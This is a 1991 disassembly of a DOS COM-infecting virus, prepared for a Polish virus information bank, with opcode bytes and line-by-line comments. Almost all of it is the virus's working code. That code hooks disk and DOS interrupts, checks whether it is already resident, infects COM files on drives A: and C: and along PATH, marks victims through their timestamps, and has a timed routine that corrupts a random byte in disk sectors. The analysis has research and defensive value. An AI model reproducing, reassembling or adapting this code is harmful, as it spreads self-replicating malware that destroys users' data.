;-------------------------------------------------
; Virus 
;
; dissasembled by Andrzej Kadlof July 1991
;
; (C) Polish section of Virus Information Bank
;------------------------------------------------

0100 E97801         JMP     027B

; old INT 13h vector

0103 7A0F
0105 7000

;====================
; INT 13h handler

0107 9C             PUSHF
0108 50             PUSH    AX
0109 53             PUSH    BX
010A 51             PUSH    CX
010B 52             PUSH    DX
010C 1E             PUSH    DS
010D 06             PUSH    ES
010E 57             PUSH    DI

010F 0E             PUSH    CS
0110 1F             POP     DS
0111 50             PUSH    AX
0112 B000           MOV     AL,00
0114 3D0002         CMP     AX,0200     ; request: read sectors?
0117 58             POP     AX          ; restore oryginal function number
0118 7571           JNZ     018B        ; no, exit

011A 80F900         CMP     CL,00       ; first sector number (illegal)
011D 7518           JNZ     0137        ; not zero, not virus question

011F 81FF3412       CMP     DI,1234     ; question from new copy of virus 
0123 7512           JNZ     0137        ; no

; prepare answer for the question from next virsus copy

0125 5F             POP     DI
0126 BF2143         MOV     DI,4321     ; answer: I'm here!
0129 58             POP     AX
012A 58             POP     AX
012B A19901         MOV     AX,[0199]   ; old INT 21h
012E 50             PUSH    AX
012F A19B01         MOV     AX,[019B]
0132 50             PUSH    AX
0133 57             PUSH    DI
0134 EB55           JMP     018B        ; exit
0136 90             NOP

; check cylinder number, if not 4x + 2 or 4x + 3 then exit (x arbitrary)

0137 51             PUSH    CX
0138 81E100FC       AND     CX,FC00
013C 80FD00         CMP     CH,00
013F 59             POP     CX
0140 7449           JZ      018B        ; exit

; check time condition

0142 51             PUSH    CX
0143 52             PUSH    DX
0144 B80000         MOV     AX,0000
0147 FB             STI
0148 CD1A           INT     1A         ; read the clock

014A 81E2FF0F       AND     DX,0FFF    ; low word of tick count since reset
014E 83FA00         CMP     DX,+00     ; about 3.7 min
0151 5A             POP     DX
0152 59             POP     CX
0153 7536           JNZ     018B       ; exit

;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
; DESTRUCTION! change one byte on the sector on the next track
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

0155 9C             PUSHF
0156 0E             PUSH    CS          ; segment of return address
0157 B86601         MOV     AX,0166     ; offset of return address
015A 50             PUSH    AX
015B B80102         MOV     AX,0201     ; read 1 sector
015E 80C501         ADD     CH,01       ; next track
0161 2EFF2E0301     JMP     DWORD PTR CS:[0103]    ; CALL FAR INT 13h

0166 7223           JB      018B        ; exit

; get random number between 0 and 1FFh (minimal buffer size)

0168 51             PUSH    CX
0169 52             PUSH    DX
016A B80000         MOV     AX,0000
016D FB             STI
016E CD1A           INT     1A          ; read the clock

0170 81E2FF01       AND     DX,01FF     ; low word of tick count since reset

; change one byte inside buffer

0174 53             PUSH    BX          ; offset of buffer
0175 03DA           ADD     BX,DX       ; random byte in buffer
0177 26880F         MOV     ES:[BX],CL  ; undefined value (first sector)
017A 5B             POP     BX          ; restore buffer address

; write buffer back to disk

017B 5A             POP     DX          ; disk/head
017C 59             POP     CX          ; track/sector
017D 9C             PUSHF
017E 0E             PUSH    CS          ; segment of return address
017F B88B01         MOV     AX,018B     ; offset of return address
0182 50             PUSH    AX
0183 B80103         MOV     AX,0301     ; write 1 sector
0186 2EFF2E0301     JMP     DWORD PTR CS:[0103]       ; CALL FAR INT 13h

; exit to old INT 13h

018B 5F             POP     DI
018C 07             POP     ES
018D 1F             POP     DS
018E 5A             POP     DX
018F 59             POP     CX
0190 5B             POP     BX
0191 58             POP     AX
0192 9D             POPF
0193 2EFF2E0301     JMP     DWORD PTR CS:[0103]  ; INT 13h
0198 90             NOP

;---------------
; working area

; old INT 21h vector

0199 9E10
019B 1801

019D 26 0D      ; segment of environment block
019F 80 00      ; address of command line
01A1 2B 0D      ; CS
01A3 5C 00      ; first FCB in PSP
01A5 2B 0D      ; CS
01A7 6C 00      ; second FCB in PSP
01A9 2B 0D      ; CS
01AB CF 01      ; runtime SP

01AD 2B 0D      ; old SS, CS
01AF 02 19      ; old SP

;------------
; local stack

01B1 9D01
01B3 857F
01B5 FF58
01B7 2B0D
01B9 2F01
01BB E37F
01BD D300
01BF 0001
02C1 2C00
01C3 260D
02C5 2B0D
01C7 430C
01C9 2903
01CB 2B0D
01CD 02F2

; end of local stack
;-------------------

01CF 90             NOP
01D0 90             NOP

;=====================
; INT 21h handler

01D1 9C             PUSHF
01D2 56             PUSH    SI
01D3 50             PUSH    AX
01D4 53             PUSH    BX
01D5 51             PUSH    CX
01D6 52             PUSH    DX
01D7 1E             PUSH    DS
01D8 06             PUSH    ES
01D9 57             PUSH    DI
01DA 80FC4B         CMP     AH,4B       ; load and execute
01DD 7555           JNZ     0234        ; exit

01DF 1E             PUSH    DS
01E0 52             PUSH    DX
01E1 0E             PUSH    CS
01E2 1F             POP     DS
01E3 C70698036906   MOV     WORD PTR [0398],0669  ; virus length
01E9 E8E203         CALL    05CE      ; intercept INT 24h and prepare local DTA

01EC 5F             POP     DI
01ED 07             POP     ES
01EE 06             PUSH    ES
01EF 57             PUSH    DI
01F0 B80000         MOV     AX,0000
01F3 B98000         MOV     CX,0080
01F6 F2AE           REPNZ   SCASB
01F8 83F900         CMP     CX,+00
01FB 7432           JZ      022F

01FD 4F             DEC     DI
01FE B05C           MOV     AL,5C       ; '\'
0200 4F             DEC     DI
0201 AE             SCASB
0202 75F9           JNZ     01FD

0204 57             PUSH    DI
0205 59             POP     CX
0206 5E             POP     SI
0207 1F             POP     DS
0208 0E             PUSH    CS
0209 07             POP     ES
020A BF6906         MOV     DI,0669     ; buffer (area behind virus code)
020D AC             LODSB
020E AA             STOSB
020F 3BF1           CMP     SI,CX
0211 75FA           JNZ     020D

0213 0E             PUSH    CS
0214 1F             POP     DS
0215 893EA203       MOV     [03A2],DI
0219 BEAC03         MOV     SI,03AC
021C B90600         MOV     CX,0006
021F AC             LODSB
0220 AA             STOSB
0221 E2FC           LOOP    021F

0223 BA6906         MOV     DX,0669
0226 E87302         CALL    049C        ; find and infect one COM file

0229 E8D703         CALL    0603        ; restore DTA and INT 24h

022C EB06           JMP     0234        ; exit
022E 90             NOP

022F 58             POP     AX
0230 58             POP     AX
0231 E8CF03         CALL    0603        ; restore DTA and INT 24h

; exit to old INT 21h

0234 90             NOP
0235 5F             POP     DI
0236 07             POP     ES
0237 1F             POP     DS
0238 5A             POP     DX
0239 59             POP     CX
023A 5B             POP     BX
023B 58             POP     AX
023C 5E             POP     SI
023D 9D             POPF
023E 2EFF2E9901     JMP     DWORD PTR CS:[0199]
0243 90             NOP

;------------------------
; prepare Load & Execute

0244 8CC0           MOV     AX,ES
0246 8BE8           MOV     BP,AX
0248 8BD7           MOV     DX,DI       ; offset of victim name 
024A 8CC8           MOV     AX,CS
024C 8EC0           MOV     ES,AX       ; segment of victim name 
024E BB9D01         MOV     BX,019D     ; run parameters
0251 06             PUSH    ES
0252 53             PUSH    BX
0253 8CC8           MOV     AX,CS       ; block segment
0255 8EC0           MOV     ES,AX
0257 BBD300         MOV     BX,00D3     ; block size in paragraphs
025A B44A           MOV     AH,4A       ; resize memory block

025C CD21           INT     21

; free environment block

025E BF2C00         MOV     DI,002C     ; address of environment block in PSP
0261 8E05           MOV     ES,[DI]     ; segment of environment
0263 B80049         MOV     AX,4900     ; free memory block
0266 CD21           INT     21

0268 5B             POP     BX
0269 07             POP     ES
026A 58             POP     AX
026B 8C0EAD01       MOV     [01AD],CS
026F 8E16AD01       MOV     SS,[01AD]
0273 8B26AB01       MOV     SP,[01AB]
0277 8EDD           MOV     DS,BP
0279 50             PUSH    AX
027A C3             RET

;===========================
; virus entry point

; look for resident part of virus in RAM
; on system with 3 floppy drives this test may hang the computer 
; (unspecified I/O buffer BX)

027B B203           MOV     DL,03       ; third floppy drive
027D B600           MOV     DH,00       ; head 0
027F B100           MOV     CL,00       ; first sector 0
0281 B500           MOV     CH,00       ; track
0283 B80102         MOV     AX,0201     ; read 1 sector
0286 BF3412         MOV     DI,1234     ; is already in memory?
0289 CD13           INT     13

028B 81FF2143       CMP     DI,4321     ; expected answer
028F 7503           JNZ     0294        ; memory is clear

0291 E92601         JMP     03BA        ; exit

; intercept INT 21h and INT 13h

0294 B82135         MOV     AX,3521     ; get INT 21h
0297 CD21           INT     21

0299 891E9901       MOV     [0199],BX
029D 8C069B01       MOV     [019B],ES
02A1 BAD101         MOV     DX,01D1
02A4 B82125         MOV     AX,2521     ; set INT 21h
02A7 CD21           INT     21

02A9 B435           MOV     AH,35       ; get INT 13h
02AB B013           MOV     AL,13
02AD CD21           INT     21

02AF 891E0301       MOV     [0103],BX
02B3 8C060501       MOV     [0105],ES
02B7 B425           MOV     AH,25       ; set INT 13h
02B9 B013           MOV     AL,13
02BB BA0701         MOV     DX,0107
02BE CD21           INT     21

; prepare Load & Execute

02C0 BF2C00         MOV     DI,002C     ; address of environment in PSP
02C3 8B05           MOV     AX,[DI]
02C5 A39D01         MOV     [019D],AX
02C8 8C0EA101       MOV     [01A1],CS
02CC C7069F018000   MOV     WORD PTR [019F],0080        ; command line
02D2 8C0EA501       MOV     [01A5],CS
02D6 C706A3015C00   MOV     WORD PTR [01A3],005C        ; first FCB in PSP
02DC 8C0EA901       MOV     [01A9],CS
02E0 C706A7016C00   MOV     WORD PTR [01A7],006C        ; second FCB

; look for program name (DOS 3.x or higher)

02E6 FC             CLD
02E7 BF2C00         MOV     DI,002C     ; segment of environment block
02EA 8E05           MOV     ES,[DI]
02EC BF0000         MOV     DI,0000     ; start of environment

02EF B80000         MOV     AX,0000     ; end of block marker
02F2 B90080         MOV     CX,8000     ; maxim block size
02F5 2BCF           SUB     CX,DI       ; end of block
02F7 7230           JB      0329        ; not found

02F9 F2AE           REPNZ   SCASB
02FB B80000         MOV     AX,0000
02FE AE             SCASB
02FF 75EE           JNZ     02EF

0301 B80100         MOV     AX,0001
0304 AE             SCASB
0305 7522           JNZ     0329

0307 B80000         MOV     AX,0000
030A AE             SCASB
030B 751C           JNZ     0329

030D E834FF         CALL    0244        ; prepare Load & Execute

0310 B8004B         MOV     AX,4B00     ; load and execute
0313 E86F00         CALL    0385        ; INT 21h

; clear environment block

0316 0E             PUSH    CS
0317 1F             POP     DS
0318 BF2C00         MOV     DI,002C     ; environment
031B B80000         MOV     AX,0000     ; end of block marker
031E 8905           MOV     [DI],AX     ; start of block
0320 BAD300         MOV     DX,00D3     ; size of virus block in paragraphs
0323 B80031         MOV     AX,3100     ; terminate and state resident
0326 E85C00         CALL    0385        ; far call to INT 21h

; victim name not found (DOS < 3.0)
; execute command >C:\COMMAND.COM /P

0329 E818FF         CALL    0244        ; prepare Load & Execute
032C 0E             PUSH    CS
032D 1F             POP     DS
032E BA7603         MOV     DX,0376     ; 'c:\command.com',0
0331 57             PUSH    DI
0332 BF8000         MOV     DI,0080     ; command line
0335 C705022F       MOV     WORD PTR [DI],2F02     ; 2, '/'
0339 C74502500D     MOV     WORD PTR [DI+02],0D50  ; 'P', CR
033E 5F             POP     DI
033F B8004B         MOV     AX,4B00     ; load and execute
0342 E84000         CALL    0385        ; far call to INT 21h

0345 B86300         MOV     AX,0063     ; 'c'
0348 57             PUSH    DI
0349 BF7603         MOV     DI,0376     ; 'c:\command.com',0
034C 8805           MOV     [DI],AL
034E 5F             POP     DI
034F B8004B         MOV     AX,4B00     ; load and execute
0352 E83000         CALL    0385        ; far call to INT 21h

; restore INT 13h

0355 B81325         MOV     AX,2513     ; set INT 13h
0358 8B160301       MOV     DX,[0103]
035C FF360501       PUSH    [0105]
0360 1F             POP     DS
0361 CD21           INT     21

; restore INT 13h

0363 B82125         MOV     AX,2521
0366 8B169901       MOV     DX,[0199]
036A FF369B01       PUSH    [019B]
036E 1F             POP     DS
036F CD21           INT     21

0371 0E             PUSH    CS
0372 1F             POP     DS
0373 EB45           JMP     03BA
0375 90             NOP

0376 63 3A 5C 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00    ; c:\COMMAND.COM

;---------------------
; FAR CALL to INT 21h

0385 2E8F069603     POP     CS:[0396]   ; offset of caller
038A 9C             PUSHF               ; prepare jump to INT 21h
038B 0E             PUSH    CS          ; segment of return address
038C 2EFF369603     PUSH    CS:[0396]   ; offset of return addres
0391 2EFF2E9901     JMP     DWORD PTR CS:[0199]   ; CALL FAR INT 13h

;--------------
; working area

0396 96 05              ; place for offset of return address
0398 60 D2              ; length of victim
039A 80 00              ; old DTA offset
039C C2 0A              ; old DTA segment
039E 00 00              ; counter ?
03A0 00 00              ; DS
03A2 FA CC              ; working, end of path
03A4 50 41 54 48 3D                 ; PATH=
03A9 61 3A 5C 2A 2E 63 6F 6D 00     ; a:\*.com, 0

; old INT 24h

03B2 49 01      ; offset
03B4 48 09      ; segment

;==================
; INT 24h handler

03B6 90             NOP
03B7 B003           MOV     AL,03
03B9 CF             IRET

;---------------------------------
; virus alredy resident, continue

03BA 06             PUSH    ES
03BB 1E             PUSH    DS
03BC 0E             PUSH    CS
03BD 1F             POP     DS
03BE 8F069901       POP     [0199]      ; old INT 21h offset
03C2 8F069B01       POP     [019B]      ; old INT 21h segment
03C6 E80502         CALL    05CE        ; prepare INT 24h and DTA

03C9 BEA903         MOV     SI,03A9     ; address of 'a:\*.com, 0'
03CC 8B3E9803       MOV     DI,[0398]   ; buffer outside viruse code
03D0 B90900         MOV     CX,0009     ; number of bytes
03D3 AC             LODSB
03D4 AA             STOSB
03D5 E2FC           LOOP    03D3

03D7 8B3E9803       MOV     DI,[0398]   ; buffer
03DB 83C703         ADD     DI,+03
03DE 893EA203       MOV     [03A2],DI
03E2 8B3E9803       MOV     DI,[0398]
03E6 B86100         MOV     AX,0061     ; drive 'a'
03E9 8805           MOV     [DI],AL     ; patch 'a:\*.com', 0
03EB 8BD7           MOV     DX,DI       ; buffer
03ED E8AC00         CALL    049C        ; find and infect one COM program

03F0 BEA903         MOV     SI,03A9
03F3 8B3E9803       MOV     DI,[0398]
03F7 B90900         MOV     CX,0009
03FA AC             LODSB
03FB AA             STOSB
03FC E2FC           LOOP    03FA

03FE 8B3E9803       MOV     DI,[0398]
0402 B86300         MOV     AX,0063     ; drive 'c'
0405 8805           MOV     [DI],AL     ; patch 'a:\*.com', 0
0407 8BD7           MOV     DX,DI
0409 E89000         CALL    049C        ; find and infect one COM program

040C 7203           JB      0411

040E E91302         JMP     0624

0411 BF2C00         MOV     DI,002C     ; environment
0414 8E05           MOV     ES,[DI]
0416 BF0000         MOV     DI,0000
0419 BEA403         MOV     SI,03A4     ; 'PATH='
041C 46             INC     SI
041D B85000         MOV     AX,0050     ; 'P'
0420 B90080         MOV     CX,8000     ; max block size
0423 2BCF           SUB     CX,DI
0425 7303           JAE     042A

0427 E9FA01         JMP     0624        ; not found

042A F2AE           REPNZ   SCASB
042C B90400         MOV     CX,0004
042F AC             LODSB
0430 AE             SCASB
0431 75E6           JNZ     0419

0433 E2FA           LOOP    042F

0435 8B369803       MOV     SI,[0398]
0439 56             PUSH    SI
043A 57             PUSH    DI
043B 5E             POP     SI
043C 5F             POP     DI
043D 06             PUSH    ES
043E 0E             PUSH    CS
043F 07             POP     ES
0440 1F             POP     DS
0441 AC             LODSB
0442 AA             STOSB
0443 3C3B           CMP     AL,3B       ; ';' end of path marker
0445 7409           JZ      0450

0447 3C00           CMP     AL,00       ; end of block marker
0449 7402           JZ      044D

044B EBF4           JMP     0441        ; end of block

044D BE0000         MOV     SI,0000
0450 1E             PUSH    DS
0451 0E             PUSH    CS
0452 1F             POP     DS
0453 8F06A003       POP     [03A0]
0457 89369E03       MOV     [039E],SI
045B 4F             DEC     DI
045C 4F             DEC     DI

; check for last character '\', add if necessary

045D B05C           MOV     AL,5C    ; '\'
045F 3805           CMP     [DI],AL
0461 7403           JZ      0466

0463 47             INC     DI
0464 8805           MOV     [DI],AL
0466 47             INC     DI

; form new path ....\*.com, 0

0467 BEAC03         MOV     SI,03AC     ; *.com
046A 893EA203       MOV     [03A2],DI
046E B90600         MOV     CX,0006     ; length

0471 AC             LODSB
0472 AA             STOSB
0473 E2FC           LOOP    0471

0475 A19803         MOV     AX,[0398]   ; buffer
0478 8BD0           MOV     DX,AX
047A E81F00         CALL    049C        ; find and infect COM file

047D 7203           JB      0482

047F E9A201         JMP     0624

0482 833E9E0300     CMP     WORD PTR [039E],+00
0487 7503           JNZ     048C

0489 E99801         JMP     0624

048C A19803         MOV     AX,[0398]
048F 8BF8           MOV     DI,AX
0491 8B369E03       MOV     SI,[039E]
0495 FF36A003       PUSH    [03A0]
0499 1F             POP     DS
049A EBA5           JMP     0441

;---------------------------------
; find and infect one COM program

049C 0E             PUSH    CS
049D 07             POP     ES
049E B8004E         MOV     AX,4E00     ; find first
04A1 B90300         MOV     CX,0003     ; hiden, read only
04A4 E8DEFE         CALL    0385        ; far call to INT 21h

04A7 730C           JAE     04B5

04A9 C3             RET

04AA B44F           MOV     AH,4F       ; find next
04AC B90300         MOV     CX,0003     ; hiden, read only
04AF E8D3FE         CALL    0385        ; far call to INT 21h

04B2 7301           JAE     04B5

04B4 C3             RET

; start infection

04B5 8B3E9803       MOV     DI,[0398]   ; buffer
04B9 81C78000       ADD     DI,0080     ; set DI to DTA
04BD 83C71A         ADD     DI,+1A      ; file length
04C0 8B05           MOV     AX,[DI]
04C2 2D0010         SUB     AX,1000     ; minimum victim size
04C5 7215           JB      04DC        ; file too small, find next

04C7 8B05           MOV     AX,[DI]     ; file size
04C9 2DFFEF         SUB     AX,EFFF     ; maximum file size
04CC 730E           JAE     04DC        ; file too big, find next

04CE 83EF04         SUB     DI,+04      ; file time stamp
04D1 8B05           MOV     AX,[DI]
04D3 241F           AND     AL,1F       ; extract seconds
04D5 3C18           CMP     AL,18       ; 48 seconds
04D7 7403           JZ      04DC        ; infected, find next 

04D9 EB03           JMP     04DE        ; continue
04DB 90             NOP

04DC EBCC           JMP     04AA        ; find next

; copy file name to buffer

04DE 83C708         ADD     DI,+08
04E1 8BF7           MOV     SI,DI
04E3 8B3EA203       MOV     DI,[03A2]
04E7 AC             LODSB
04E8 AA             STOSB
04E9 3C00           CMP     AL,00
04EB 75FA           JNZ     04E7

; find new file length

04ED 8B3E9803       MOV     DI,[0398]
04F1 81C78000       ADD     DI,0080     ; set DI to local DTA
04F5 83C71A         ADD     DI,+1A      ; file length
04F8 8B05           MOV     AX,[DI]
04FA 056906         ADD     AX,0669     ; new file length
04FD FF369803       PUSH    [0398]
0501 50             PUSH    AX

; clear flag Read Only

0502 8B169803       MOV     DX,[0398]
0506 B80043         MOV     AX,4300     ; get attributes
0509 E879FE         CALL    0385        ; far call to INT 21h

050C 890EC805       MOV     [05C8],CX   ; store old attributes
0510 81E1FEFF       AND     CX,FFFE     ; clear read only flag
0514 B80143         MOV     AX,4301     ; set attributes
0517 E86BFE         CALL    0385        ; far call to INT 21h

051A 7233           JB      054F        ; error, exit

; open file for read/write

051C B8023D         MOV     AX,3D02     ; open file for read/write
051F E863FE         CALL    0385        ; far call to INT 21h

0522 722B           JB      054F        ; error, exit

; set 48 second in file time stamp

0524 8BD8           MOV     BX,AX       ; hundle
0526 B80057         MOV     AX,5700     ; get time stamp
0529 E859FE         CALL    0385        ; far call to INT 21h

052C 81E1E0FF       AND     CX,FFE0     ; clear seconds
0530 83C118         ADD     CX,+18      ; set to 48
0533 890ECA05       MOV     [05CA],CX   ; store for later
0537 8916CC05       MOV     [05CC],DX

; copy first 669h bytes of file to the end

; read beginnig of file (669h bytes)

053B B96906         MOV     CX,0669     ; virus length
053E 81E90001       SUB     CX,0100     ; size of PSP
0542 8B169803       MOV     DX,[0398]
0546 81C20001       ADD     DX,0100     ; buffer
054A B43F           MOV     AH,3F       ; read file
054C E836FE         CALL    0385        ; far call to INT 21h

054F 7271           JB      05C2        ; error, exit

; move file ptr back to BOF

0551 8BFA           MOV     DI,DX
0553 BA0000         MOV     DX,0000
0556 B90000         MOV     CX,0000
0559 B80242         MOV     AX,4202     ; move file ptr to EOF
055C E826FE         CALL    0385        ; far call to INT 21h

055F 7261           JB      05C2        ; error, exit

; vrite virus code to file

0561 8BD7           MOV     DX,DI
0563 B96906         MOV     CX,0669     ; virus length
0566 81E90001       SUB     CX,0100
056A B440           MOV     AH,40       ; write file
056C E816FE         CALL    0385        ; far call to INT 21h

056F 7251           JB      05C2        ; error, exit

; move file ptr to EOF

0571 BA0000         MOV     DX,0000
0574 B90000         MOV     CX,0000
0577 B80042         MOV     AX,4200     ; move file ptr to BOF
057A E808FE         CALL    0385        ; far call to INT 21h

057D 7243           JB      05C2

; write to file its beginning block

057F 8F069803       POP     [0398]
0583 FF369803       PUSH    [0398]
0587 B96906         MOV     CX,0669     ; end of virus code
058A 81E90001       SUB     CX,0100     ; size of PSP
058E BA0001         MOV     DX,0100     ; from buffer
0591 B440           MOV     AH,40       ; write file
0593 E8EFFD         CALL    0385        ; far call to INT 21h

0596 722A           JB      05C2
        ; error, exit

; restore file time stamp

0598 8B0ECA05       MOV     CX,[05CA]   ; restore time stamp
059C 8B16CC05       MOV     DX,[05CC]   ; restore date stamp
05A0 B80157         MOV     AX,5701     ; set file time stamp
05A3 E8DFFD         CALL    0385        ; far call to INT 21h

; close file

05A6 B43E           MOV     AH,3E       ; close file
05A8 E8DAFD         CALL    0385        ; far call to INT 21h

; restore file attributes

05AB 8F069803       POP     [0398]
05AF 8F069803       POP     [0398]
05B3 8B169803       MOV     DX,[0398]
05B7 8B0EC805       MOV     CX,[05C8]   ; retore file attributes
05BB B80143         MOV     AX,4301     ; set file attributes
05BE E8C4FD         CALL    0385        ; far call to INT 21h

05C1 C3             RET

; exit after any error

05C2 58             POP     AX
05C3 8F069803       POP     [0398]
05C7 C3             RET

05C8 20 00              ; file attributes
05CA D8A8               ; file time stamp
05CC D516               ; file date stamp

;-----------------------------------------
; intercept INT 24h and prepare local DTA

; get INT 24h

05CE B82435         MOV     AX,3524     ; get INT 24h
05D1 E8B1FD         CALL    0385        ; far call to INT 21h

05D4 891EB203       MOV     [03B2],BX
05D8 8C06B403       MOV     [03B4],ES

; set new INT 24h

05DC B425           MOV     AH,25       ; set
05DE B024           MOV     AL,24       ; int 24h
05E0 BAB603         MOV     DX,03B6     ; offset of new handler
05E3 E89FFD         CALL    0385        ; far call to INT 21h

; get current DTA

05E6 B42F           MOV     AH,2F       ; get DTA
05E8 E89AFD         CALL    0385        ; far call to INT 21h

05EB 8C069C03       MOV     [039C],ES
05EF 891E9A03       MOV     [039A],BX

; set new local DTA

05F3 B41A           MOV     AH,1A       ; set DTA
05F5 0E             PUSH    CS
05F6 1F             POP     DS
05F7 8B169803       MOV     DX,[0398]
05FB 81C28000       ADD     DX,0080
05FF E883FD         CALL    0385        ; far call to INT 21h

0602 C3             RET

;-------------------------
; restore INT 24h and DTA

; prepare registers

0603 0E             PUSH    CS
0604 1F             POP     DS
0605 0E             PUSH    CS
0606 07             POP     ES

; restore INT 24h

0607 B82425         MOV     AX,2524     ; set INT 24h
060A 8B16B203       MOV     DX,[03B2]
060E 8E1EB403       MOV     DS,[03B4]
0612 E870FD         CALL    0385        ; far call to INT 21h

; retsore DTA

0615 8B169A03       MOV     DX,[039A]
0619 FF369C03       PUSH    [039C]
061D 1F             POP     DS
061E B41A           MOV     AH,1A
0620 E862FD         CALL    0385        ; far call to INT 21h

0623 C3             RET

;---------------------
; exit to application

0624 E8DCFF         CALL    0603        ; restore INT 24h and DTA

0627 0E             PUSH    CS
0628 1F             POP     DS
0629 BE3E06         MOV     SI,063E     ; start of oryginal code
062C 8B3E9803       MOV     DI,[0398]   ; length of victim

; copy victim code

0630 AC             LODSB
0631 AA             STOSB
0632 81FE6906       CMP     SI,0669
0636 75F8           JNZ     0630

0638 8B3E9803       MOV     DI,[0398]   ; RET address
063C 57             PUSH    DI
063D C3             RET

063E B96906         MOV     CX,0669
0641 81E90001       SUB     CX,0100
0645 8B369803       MOV     SI,[0398]
0649 2BF1           SUB     SI,CX
064B 0E             PUSH    CS
064C 1F             POP     DS
064D BF0001         MOV     DI,0100
0650 AC             LODSB
0651 AA             STOSB
0652 E2FC           LOOP    0650

0654 33C0           XOR     AX,AX
0656 33DB           XOR     BX,BX
0658 33C9           XOR     CX,CX
065A 33D2           XOR     DX,DX
065C 33F6           XOR     SI,SI
065E BF0001         MOV     DI,0100
0661 57             PUSH    DI
0662 33FF           XOR     DI,DI
0664 33ED           XOR     BP,BP
0666 C3             RET

0667 90             NOP
0668 90             NOP

; end resident part of virus
;-----------------------------
; victim code